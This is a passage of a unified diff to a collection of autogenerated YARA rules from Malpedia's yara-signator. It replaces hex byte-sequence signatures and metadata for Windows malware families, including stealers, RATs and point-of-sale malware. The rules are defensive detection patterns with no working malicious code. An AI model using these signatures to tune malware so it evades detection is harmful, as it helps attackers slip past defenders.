4881ec58010000 488d6c2420 488bfc b956000000 } - $sequence_3 = { 488b8d00010000 e8???????? 488b8dd8000000 488bd1 488bc8 e8???????? } - $sequence_4 = { e8???????? 488d0da1af0000 e8???????? 488d0d85af0000 } - $sequence_5 = { 488bc8 e8???????? 488b5508 488b8d00010000 } - $sequence_6 = { e8???????? 488d0dc1ad0000 e8???????? 488d0da5ad0000 } - $sequence_7 = { 488d6c2430 488bfc b98a000000 b8cccccccc f3ab 488b8c2448020000 488b05???????? } - $sequence_8 = { 488d1deb7e0000 4184c0 7539 410bc0 488d542458 488d0ddfd30000 8905???????? } - $sequence_9 = { 488b4c2438 488d442430 4889442428 4c8d4c2434 488d442440 4533c0 488d1548830000 } + $sequence_0 = { 83e4f8 81ecdc0b0000 a1???????? 33c4 898424d80b0000 53 56 } + $sequence_1 = { 0f84af000000 53 57 8bc6 e8???????? 83c408 } + $sequence_2 = { 0f84d8000000 6a00 8d4dfc 51 53 } + $sequence_3 = { ffd7 8d4c2428 51 8d942414040000 68???????? } + $sequence_4 = { 88040f 47 897df8 8b45f4 03c6 } + $sequence_5 = { ffd6 68???????? ffd6 5f 5e b801000000 } + $sequence_6 = { ffd6 68???????? c745fc00000000 ffd6 } + $sequence_7 = { 8935???????? ffd7 8d5e01 85c0 7539 a1???????? } + $sequence_8 = { ff15???????? 488905???????? 4885c0 0f84fbf8ffff } + $sequence_9 = { 4885c0 7486 488364242000 4c8d8d90030000 448bc3 488bd0 488bcf } + $sequence_10 = { 80bd3006000020 418bce 7511 488d8530060000 } + $sequence_11 = { 33d2 e8???????? 488d0da4320000 ff15???????? 488d9520040000 488d0d90320000 448bc0 } + $sequence_12 = { 488d8d10020000 ff15???????? 488d4d90 448bc3 } + $sequence_13 = { 488d5590 488d0daa300000 448bc0 e8???????? } + $sequence_14 = { 488d542450 488d0dad290000 448bc0 e8???????? 488b0d???????? } + $sequence_15 = { 488d4c2420 4c8bc6 33d2 e8???????? 488d0dc5450000 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <120832 } -rule MALPEDIA_Win_Bernhardpos_Auto : FILE +rule MALPEDIA_Win_Predator_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7b2918eb-6e4b-588b-9817-19ede384242f" + id = "139b7e6c-7d6f-5725-bc06-83e05af2728a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bernhardpos_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.predator_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "b0e71b787dda9e2d7e79e7ddddae77406aa6aa8d138e23e43da621be02324cd1" + logic_hash = "4f1faf378ed80607ad7505f3b525c8d2a5bbf8d81c1cadcdd453ab7a1d609878" score = 75 quality = 75 tags = "FILE" @@ -139615,32 +142516,32 @@ rule MALPEDIA_Win_Bernhardpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f840a010000 8d85ecfbffff 50 682a020000 68???????? 8b8df0fbffff } - $sequence_1 = { ff15???????? 8b8d54feffff 668901 6a10 8d855cfeffff 50 } - $sequence_2 = { 0fbe5415f8 33ca 8b4508 0345f4 8808 ebc7 5f } - $sequence_3 = { 8945fc 8b45fc 8b4d08 03483c 894df4 } - $sequence_4 = { 8808 ebc7 5f 5e 5b } - $sequence_5 = { 668b0d???????? 66894dfc 8a15???????? 8855fe 8d45f8 50 ff15???????? } - $sequence_6 = { 83e863 5f 5e 5b } - $sequence_7 = { 51 ff15???????? 8d85ecfeffff 50 e8???????? 83c404 85c0 } - $sequence_8 = { eb2c 33c0 eb2d 33c0 eb29 } - $sequence_9 = { e8???????? 83c404 6a01 8d85d0feffff 50 ff15???????? } + $sequence_0 = { 55 8bec 83ec18 8bc2 56 8bf1 8d4dfd } + $sequence_1 = { 80c230 8811 85c0 75f2 51 8d45fd } + $sequence_2 = { 8d4dfd 57 6a0a 5f 85c0 7916 } + $sequence_3 = { 03c2 8bce 50 e8???????? 5f 8bc6 5e } + $sequence_4 = { 7508 83c8ff e9???????? ff75ec e8???????? } + $sequence_5 = { 83ec18 8bc2 56 8bf1 8d4dfd } + $sequence_6 = { ff75ec e8???????? 59 8bf0 } + $sequence_7 = { 7508 83c8ff e9???????? ff75ec e8???????? 59 8bf0 } + $sequence_8 = { 894e08 89560c 834dfcff 8b4df4 64890d00000000 5f 5e } + $sequence_9 = { 8b00 57 03c2 8bce } condition: - 7 of them and filesize <368640 + 7 of them and filesize <2211840 } -rule MALPEDIA_Win_Firechili_Auto : FILE +rule MALPEDIA_Win_Catchamas_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1e675a4c-a97c-5312-b559-588fd9dfae94" + id = "f5823958-4dc9-52e1-b587-ac7a6b699e31" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.firechili_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.catchamas_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "39f362d1cc29968bda0685edf846cfad0cc3545d7d80fc48d26a5fd5a4bdf9c6" + logic_hash = "49e84bf121f6f46a8c4833df80092f815e20586f9bd57ea545ff931ae803e6c2" score = 75 quality = 75 tags = "FILE" @@ -139654,32 +142555,32 @@ rule MALPEDIA_Win_Firechili_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7d11 48837c242000 7509 b201 33c9 e8???????? 33c0 } - $sequence_1 = { 488b7c2458 488b6c2460 4885f6 744e } - $sequence_2 = { 4533c0 4889742420 488d55f7 ff15???????? } - $sequence_3 = { c744242866730000 4533c0 33d2 48c744242008020000 ff15???????? c605????????01 488bd7 } - $sequence_4 = { 488b7c2430 488b742438 4c8b6c2428 498b442408 } - $sequence_5 = { c3 4c8bdc 4d894318 49895310 53 56 4883ec68 } - $sequence_6 = { 418bc6 81c200040000 4a393400 740c ffc1 48ffc0 483bc2 } - $sequence_7 = { 4889742458 418d5020 48897c2460 ff15???????? 8bf8 85c0 784b } - $sequence_8 = { 4c8bc1 488bc1 6690 66833800 } - $sequence_9 = { 488d05ff500000 c605????????01 488905???????? 488905???????? 4883c420 } + $sequence_0 = { ffd6 6808080000 8d54246c 52 } + $sequence_1 = { 5f 5e 8b8c247c200000 33cc e8???????? } + $sequence_2 = { 6a00 ff15???????? e8???????? 8bcb 8b5c244c 51 } + $sequence_3 = { 6683f814 0f84c4080000 833d????????00 0f85af000000 } + $sequence_4 = { 50 bf01000000 ff15???????? 56 ff15???????? 85ff 0f851a010000 } + $sequence_5 = { 50 8d8c2494100000 68???????? 51 ff15???????? 83c42c 33c0 } + $sequence_6 = { 84c0 8b45e0 7409 e8???????? 8bfc eb32 } + $sequence_7 = { ffd7 6a0a 56 8be8 ffd7 8bf8 } + $sequence_8 = { 83e802 0f84bf090000 83e80d 0f845a090000 } + $sequence_9 = { 51 57 8bf0 50 ebbd e8???????? } condition: - 7 of them and filesize <91136 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Havex_Rat_Auto : FILE +rule MALPEDIA_Win_Newsreels_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cb4848d9-dd93-5427-b320-640a482386ab" + id = "d0a51f50-02b3-5e2e-87a4-1bcf6809c906" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.havex_rat_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newsreels_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "fa73eedcf8aaa6cbc56ae3cdeefa1daf5290fc7704b83fa7deffe1125fde8d25" + logic_hash = "fc1a2dbb3b05d6d5724530e791c74623a98e89ee20e6cc268616876a0ad255a8" score = 75 quality = 75 tags = "FILE" @@ -139693,32 +142594,32 @@ rule MALPEDIA_Win_Havex_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 134304 8937 ebd8 8917 c74704ffffff7f 8bc7 5e } - $sequence_1 = { 0fb7c0 b9ffff0000 663bc8 7576 834dec04 33f6 3975ec } - $sequence_2 = { e8???????? 8bcf c745dcac230510 e8???????? e8???????? c20400 6a30 } - $sequence_3 = { 297d78 c78580000000feffffff 29bd80000000 8d4417ff 660fb67801 66c1e908 66c1e708 } - $sequence_4 = { 56 8d8550feffff e8???????? ff757c 8d8550feffff ff7574 } - $sequence_5 = { 8b7d08 59 59 3bc3 7404 8938 eb02 } - $sequence_6 = { 84c0 0f854bffffff 33f6 e9???????? 8bb5c8fdffff e9???????? 55 } - $sequence_7 = { 740a 6683f85c 0f858e000000 83c8ff 5f 5e 5b } - $sequence_8 = { 68???????? 8d4c2414 e8???????? 8d442410 50 8d4c2430 897c2464 } - $sequence_9 = { 5b c9 c3 55 8bec 8b4614 83ec10 } + $sequence_0 = { 7516 39ac247c030000 7d37 5e 5d 83c8ff } + $sequence_1 = { 53 53 8d8424e0030000 68???????? 50 66899c24a0000000 c784249c00000001010000 } + $sequence_2 = { ff15???????? e9???????? 6a4d 6a08 68???????? e8???????? 8b35???????? } + $sequence_3 = { 6a4d f2ae f7d1 49 } + $sequence_4 = { 8d542460 8d4c2454 83c448 8b02 8b11 3bc2 } + $sequence_5 = { 83c408 85db 750a 5e 5d } + $sequence_6 = { 33f6 e8???????? 8bd8 83c408 85db 7516 } + $sequence_7 = { 51 e8???????? 8b742430 8b542431 8b442432 81e6ff000000 8b4c2433 } + $sequence_8 = { 8b9c24e0110000 8808 8b15???????? 8bcb 8bc1 } + $sequence_9 = { 51 6a09 6a08 52 66894808 e8???????? } condition: - 7 of them and filesize <892928 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Arefty_Auto : FILE +rule MALPEDIA_Win_Pkybot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "290417d3-5ee5-5229-8624-fd994b33b5b6" + id = "b29148a6-8685-5645-99d4-ca854d32849e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.arefty_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pkybot_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "f5f9e554cdcd0132916bd1281d9476767533aa9af2658a9193107a622555119f" + logic_hash = "809773f54b9553ffea062fd7f87645abd3e261a3e38fb26640ff099fc49a005e" score = 75 quality = 75 tags = "FILE" @@ -139732,32 +142633,32 @@ rule MALPEDIA_Win_Arefty_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 e8???????? 83c404 83fbff 7407 53 } - $sequence_1 = { 50 53 ff15???????? 680000a000 e8???????? } - $sequence_2 = { 680000a000 57 53 ff15???????? 85c0 } - $sequence_3 = { 680000a000 57 53 ff15???????? } - $sequence_4 = { 57 e8???????? 83c404 83fbff 7407 53 ff15???????? } - $sequence_5 = { ff15???????? 680000a000 e8???????? 8bf8 } - $sequence_6 = { 0fb6041e 50 8b07 68???????? 6a03 8d04b0 } - $sequence_7 = { 8b07 68???????? 6a03 8d04b0 50 e8???????? 46 } - $sequence_8 = { 50 53 ff15???????? 680000a000 e8???????? 8bf8 83c404 } - $sequence_9 = { 50 53 ff15???????? 680000a000 } + $sequence_0 = { ff15???????? 8bf8 83ffff 7429 56 56 } + $sequence_1 = { 8d45e0 50 8b06 83c004 50 } + $sequence_2 = { 8b4e04 21413c c741300e000000 897938 5f 5e } + $sequence_3 = { 7409 ff75dc e8???????? 59 56 } + $sequence_4 = { 8b0d???????? 894108 e8???????? a3???????? } + $sequence_5 = { 7518 ff35???????? e8???????? 59 893d???????? 893d???????? } + $sequence_6 = { 56 a3???????? e8???????? 83c448 } + $sequence_7 = { 57 6a10 ff7510 8d45ec 50 e8???????? } + $sequence_8 = { 7430 50 3bf7 7507 e8???????? eb05 e8???????? } + $sequence_9 = { 8d85ecfdffff 50 8d45f4 50 53 57 ff75fc } condition: - 7 of them and filesize <237568 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Oski_Auto : FILE +rule MALPEDIA_Win_Blackpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e23300f3-24c2-58db-ad53-9ccc894ba178" + id = "52663687-3a52-5b88-8f0a-e8064cfb2262" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oski_auto.yar#L1-L187" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackpos_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "32e88579dcf8b669972c260572f27190a2af2a9bf4eb835092b7f8cb9a6a6e17" + logic_hash = "8568ffc0a3f0ef5ce5cdc7a729339af7d16e27d116b4f347ef077609e2cc96da" score = 75 quality = 75 tags = "FILE" @@ -139771,39 +142672,32 @@ rule MALPEDIA_Win_Oski_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 a1???????? 50 8d8df0feffff 51 e8???????? } - $sequence_1 = { 25ff7f0000 c3 8bff 55 8bec 83ec14 ff7510 } - $sequence_2 = { e8???????? 83c40c e8???????? 50 a1???????? 50 } - $sequence_3 = { 8975f0 e8???????? cc 8bff 55 8bec 8b550c } - $sequence_4 = { 7408 39b5acfeffff 7787 6803010000 8d95edfeffff 56 } - $sequence_5 = { 83431810 66898568fbffff 8b4314 85c0 7577 8b8d84fbffff 51 } - $sequence_6 = { 6a00 6a1a 6a00 8985eceeffff 898df0eeffff } - $sequence_7 = { 53 68???????? 8d8de4feffff 51 53 } - $sequence_8 = { e8???????? 83c404 56 8d85ecfeffff 50 8d8dd0fcffff } - $sequence_9 = { f3c3 e9???????? 8bff 55 8bec 83ec1c a1???????? } - $sequence_10 = { e8???????? 83c404 8b0d???????? 51 ff15???????? a3???????? 833d????????00 } - $sequence_11 = { 8b5508 52 a1???????? 50 8d8de8fdffff } - $sequence_12 = { 83c404 8b55f8 8955f4 8b45f4 50 e8???????? } - $sequence_13 = { 50 8d4df8 51 6800020000 8b55f4 52 ff15???????? } - $sequence_14 = { 6a00 e8???????? 83c40c 8985e4fdffff } - $sequence_15 = { 8d55f4 52 6a00 68???????? ff15???????? 8945f0 } - $sequence_16 = { 83c220 52 6a00 6a00 ff15???????? } + $sequence_0 = { e9???????? b800000200 3bf8 7602 8bf8 8d85f4fffdff } + $sequence_1 = { 3bca 7408 47 83ff44 72ef eb08 } + $sequence_2 = { 83c414 85c0 7433 e8???????? 85c0 } + $sequence_3 = { 8d4dbc 51 03c6 50 e8???????? } + $sequence_4 = { 3bfb 0f84f8000000 68ff030000 8d85fdfbffff 53 50 } + $sequence_5 = { f7f9 8b4dfc 5f 5e 5b 8bc2 } + $sequence_6 = { 8b8040f84100 3bf0 7e44 83ee07 eb3f 2503000080 7905 } + $sequence_7 = { 3bf7 7513 8d45e0 50 e8???????? 59 } + $sequence_8 = { 6a07 59 6804010000 be???????? } + $sequence_9 = { e8???????? 83c40c 85c0 7414 6a01 68???????? } condition: - 7 of them and filesize <423936 + 7 of them and filesize <3293184 } -rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE +rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d04f49a-1251-5bc9-a2e1-54ed739ba752" + id = "bcfa70ed-52d3-5ff6-98d2-54bf0fdb6694" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taurus_stealer_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flying_dutchman_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "5a56120ca5bf111c092d7e02323e7c3983f49990178f81f0fd9b64062b85cfef" + logic_hash = "395092a50a0edc892d45a5d410470e4cbf5a35f346d3d2f6d581d10febaed0cd" score = 75 quality = 75 tags = "FILE" @@ -139817,32 +142711,32 @@ rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 8b7508 eb12 8d4e1c e8???????? 8bce e8???????? } - $sequence_1 = { 8d4de8 e8???????? 85f6 7408 8d4dd0 e8???????? 8b4508 } - $sequence_2 = { 88550f 88450e 8d450e 51 50 8d4d8c e8???????? } - $sequence_3 = { 51 50 8bce e8???????? 8d4dcc e8???????? 8d4db4 } - $sequence_4 = { 7305 8a5df3 ebf1 8d45f4 c645ff00 50 8bd6 } - $sequence_5 = { 8bc2 c1e802 c1e103 8b0483 d3e8 880432 42 } - $sequence_6 = { 8d4ddc e8???????? 8d4d90 e8???????? 8d4d84 e8???????? } - $sequence_7 = { c74610fe33b90f c7461465dc040b c74618e3804800 c7461cb5492c0d c7462045909c0f c74624dd90c504 c7462870e8f00e } - $sequence_8 = { 0f1145c1 885ddf 0fbe4581 250f000080 7905 48 83c8f0 } - $sequence_9 = { 40 83f806 7305 8a5df2 ebf1 8d45f3 c645f900 } + $sequence_0 = { 66890c02 83c002 6685c9 75f1 e9???????? 8b85e8feffff 83e800 } + $sequence_1 = { 48 0f84f8000000 48 0f853d010000 83bd44fcffff06 7553 8b35???????? } + $sequence_2 = { 8bec 51 56 6a18 e8???????? 33f6 } + $sequence_3 = { 8d442430 50 89742438 895c2434 68???????? eb40 57 } + $sequence_4 = { ff75f0 f3a5 ff75f4 ff15???????? ff75f4 8b35???????? ffd6 } + $sequence_5 = { 3bfb 7531 6a14 e8???????? 8bf0 59 } + $sequence_6 = { ff15???????? 3bc7 7504 33c0 eb1f 0fbf480a } + $sequence_7 = { 0f8489000000 48 747f 2ddb030000 } + $sequence_8 = { e8???????? 8be5 5d c20800 55 8bec 81eca8000000 } + $sequence_9 = { 832600 83660400 83660800 c3 8b4b04 56 57 } condition: - 7 of them and filesize <524288 + 7 of them and filesize <276480 } -rule MALPEDIA_Win_Blackenergy_Auto : FILE +rule MALPEDIA_Win_Amadey_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5db0ecdd-a93d-527c-8567-cf3a04744f9e" + id = "bcbf3802-d510-5a36-b69a-5e392988dabd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackenergy_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.amadey_auto.yar#L1-L208" license_url = "N/A" - logic_hash = "0197d7c7455032dc4a706fe02d56c8be876c2f6b4f29a6658284a54a2993239d" + logic_hash = "c915860f91ad45f2eb5b15d5deb4fc25f32146851585f24cbb18a6984390dbf0" score = 75 quality = 75 tags = "FILE" @@ -139856,71 +142750,81 @@ rule MALPEDIA_Win_Blackenergy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { bb01000000 eb02 03d8 8bc2 e9???????? 8b4df4 014dd8 } - $sequence_1 = { 39750c 740c 56 56 ff7508 ff550c } - $sequence_2 = { 8b7df4 8b75f0 8b4d08 f3a4 a1???????? 33c9 3bc1 } - $sequence_3 = { e8???????? 2bc6 3bc7 760f 6bd20a 47 e8???????? } - $sequence_4 = { 0f848f000000 53 8d45f0 50 8d45d8 50 } - $sequence_5 = { 58 e8???????? 85c0 75ae 5e 5f c9 } - $sequence_6 = { 85c0 7441 8b5dc8 8b5b28 85db 7427 8b4de4 } - $sequence_7 = { 33f6 56 6810000002 6a03 56 6a01 6800000080 } - $sequence_8 = { 8b583c 03d8 895dc8 8b4334 8945e0 33f6 46 } - $sequence_9 = { 50 ff15???????? 50 ff5508 6a02 } + $sequence_0 = { ebb0 b8???????? 83c410 5b } + $sequence_1 = { e8???????? 89c2 8b45f4 89d1 ba00000000 f7f1 } + $sequence_2 = { c744240805000000 c744240402000000 890424 e8???????? } + $sequence_3 = { c9 c3 55 89e5 81ecc8010000 } + $sequence_4 = { c70424???????? e8???????? 8b45fc 89442408 c7442404???????? 8b4508 890424 } + $sequence_5 = { c744240800020000 8d85f8fdffff 89442404 891424 e8???????? 83ec20 } + $sequence_6 = { c70424???????? e8???????? 890424 e8???????? 84c0 7407 c745fc05000000 } + $sequence_7 = { 83ec04 8945f4 837df400 7454 8b4508 890424 } + $sequence_8 = { 83fa10 722f 8b8d78feffff 42 } + $sequence_9 = { 8b8d78feffff 42 8bc1 81fa00100000 7214 8b49fc } + $sequence_10 = { 68???????? e8???????? 8d4dcc e8???????? 83c418 } + $sequence_11 = { 68???????? e8???????? 8d4db4 e8???????? 83c418 } + $sequence_12 = { 52 6a02 6a00 51 ff75f8 ff15???????? ff75f8 } + $sequence_13 = { 8bce e8???????? e8???????? 83c418 e8???????? e9???????? 52 } + $sequence_14 = { c705????????0c000000 eb31 c705????????0d000000 eb25 83f901 750c } + $sequence_15 = { 50 68???????? 83ec18 8bcc 68???????? e8???????? } + $sequence_16 = { 8bcc 68???????? e8???????? 8d8d78feffff e8???????? 83c418 } + $sequence_17 = { c78584fdffff0f000000 c68570fdffff00 83fa10 722f 8b8d58fdffff 42 } + $sequence_18 = { c78520fdffff00000000 c78524fdffff0f000000 c68510fdffff00 83fa10 722f } + $sequence_19 = { 51 e8???????? 83c408 8b950cfdffff c78520fdffff00000000 c78524fdffff0f000000 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <529408 } -rule MALPEDIA_Win_Unidentified_082_Auto : FILE +rule MALPEDIA_Win_Afrodita_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7772581c-e8cf-5615-a758-46ef9c1fc0b0" - date = "2021-10-07" - modified = "2021-10-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_082_auto.yar#L1-L124" + id = "a57e10f8-454f-5804-9e05-9ca06675125c" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.afrodita_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "fdfe1ddce9f77ac8b465b0ddebe868c5e77078cf2b2457573a5b3810682f45ee" + logic_hash = "5b27d8ca339092e6723ab16dacd8e13cc60f1f330873451b2d099d87287bfb55" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20211007" - malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535" - malpedia_version = "20211008" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8d0dbc190200 0f1f4000 0f1f840000000000 418d4801 } - $sequence_1 = { ff5018 4c634510 488d0df40a0200 488bd8 33c0 } - $sequence_2 = { 4c634510 488d0d93fa0100 488bd8 33c0 488bd3 488905???????? 488905???????? } - $sequence_3 = { ff15???????? 488b0cdf ff15???????? 48c704dfffffffff } - $sequence_4 = { 4885c0 0f84ac010000 48833d????????00 0f849e010000 48833d????????00 0f8490010000 48833d????????00 } - $sequence_5 = { 488b0d???????? 8b5108 488b4910 4533c9 458d4130 4c89742420 } - $sequence_6 = { 33c0 e9???????? 8a07 4c8b7c2448 4c8d25a64c0100 4b8b0cfc ffc3 } - $sequence_7 = { 0f1f4000 0f1f840000000000 418d4801 0fb6c2 41ffc0 f7da } - $sequence_8 = { 488b4f18 4c8d4d10 488b01 488d1587000200 41b810000000 ff5018 4c634510 } - $sequence_9 = { 48894598 eb03 4533f6 488b05???????? 80782e00 740a 80782000 } + $sequence_0 = { 83e615 83ce02 89710c 23c6 74a5 a804 740a } + $sequence_1 = { e8???????? 56 8d8558ffffff c745fc05000000 57 83cb08 50 } + $sequence_2 = { e8???????? eb02 33ff 8bb57cffffff c745fcffffffff 8b4e2c 85c9 } + $sequence_3 = { 8d4f10 e8???????? 8b0f 8b4904 03cf 85c0 7454 } + $sequence_4 = { 0f1040c0 0f1149a0 0f104c30c0 8b75e8 660fefc8 0f1040d0 0f114c30c0 } + $sequence_5 = { 897304 c6430801 53 8d4de4 } + $sequence_6 = { 8b4b08 8b7b0c 897df8 894dfc 3bce } + $sequence_7 = { e8???????? 83c40c c744be0400000000 c704be00000000 5e 5b } + $sequence_8 = { 50 8bcb ff5720 0375d4 8bce e8???????? } + $sequence_9 = { 894f04 8bc7 e9???????? 83f854 0f8fdc010000 83f853 0f8dea020000 } condition: - 7 of them and filesize <414720 + 7 of them and filesize <2334720 } -rule MALPEDIA_Win_Boldmove_Auto : FILE +rule MALPEDIA_Win_Putabmow_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ede55e68-ab48-582c-bf7e-2cb826551211" + id = "118d99b8-b7d8-55d9-89f4-cf8d56f456ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boldmove_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.putabmow_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "d529b7724e2e647d4848b38aca8e76a61b2caa5c4bf1c77fa8242a3dc71a9c2d" + logic_hash = "4091b5988ccb2a8139f14760c8b7e9d61862064b8efc99f4d36fbebf2dc41c73" score = 75 quality = 75 tags = "FILE" @@ -139934,32 +142838,32 @@ rule MALPEDIA_Win_Boldmove_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb655e4 d3e2 8b8b24300000 09d0 880431 31c0 } - $sequence_1 = { 891c24 e8???????? 893424 e8???????? 8b442434 85c0 } - $sequence_2 = { 0f85cf060000 c744246800000000 8b4c2434 b801000000 85c9 0f4fc1 8984249c000000 } - $sequence_3 = { 83cd02 89442448 e9???????? 8d4701 83cd08 89442448 } - $sequence_4 = { e8???????? 89c5 8b442438 892c24 89442404 e8???????? 8b4c2424 } - $sequence_5 = { 8b442420 89fb 8b10 e9???????? 85f6 7e03 83ee01 } - $sequence_6 = { 8b8314100000 31d2 39d0 740c 39b49318100000 7418 42 } - $sequence_7 = { 85db 0f84561d0000 81fe00040000 b800040000 0f4ec6 890424 89442440 } - $sequence_8 = { 8d4f04 7415 837c242801 0f8473050000 837c242805 7503 0fbec0 } - $sequence_9 = { 8b8310080000 31d2 39d0 740c 39b49314080000 } + $sequence_0 = { 016306 07 015100 07 015600 0801 51 } + $sequence_1 = { e8???????? 8b55f0 8b4a0c 894d08 894dec 8d4118 89420c } + $sequence_2 = { 50 51 8d3c01 eb51 ff752c 8b7524 51 } + $sequence_3 = { 05eb004805 f0005005 f0005005 f0005005 f0005005 f0005005 f0005005 } + $sequence_4 = { c74424540f000000 85c0 7c16 7f04 85f6 7410 89442418 } + $sequence_5 = { 8d4c241c e8???????? c744247001000000 6a01 51 68???????? 8d4c2424 } + $sequence_6 = { e8???????? 83c404 89442428 c7842480000000ffffffff 8b4c241c 85c9 } + $sequence_7 = { 85c0 7413 6a00 8d8c24c8070000 51 8bc8 e8???????? } + $sequence_8 = { ff15???????? 85c0 0f8420010000 837e1408 7204 8b06 } + $sequence_9 = { e9???????? 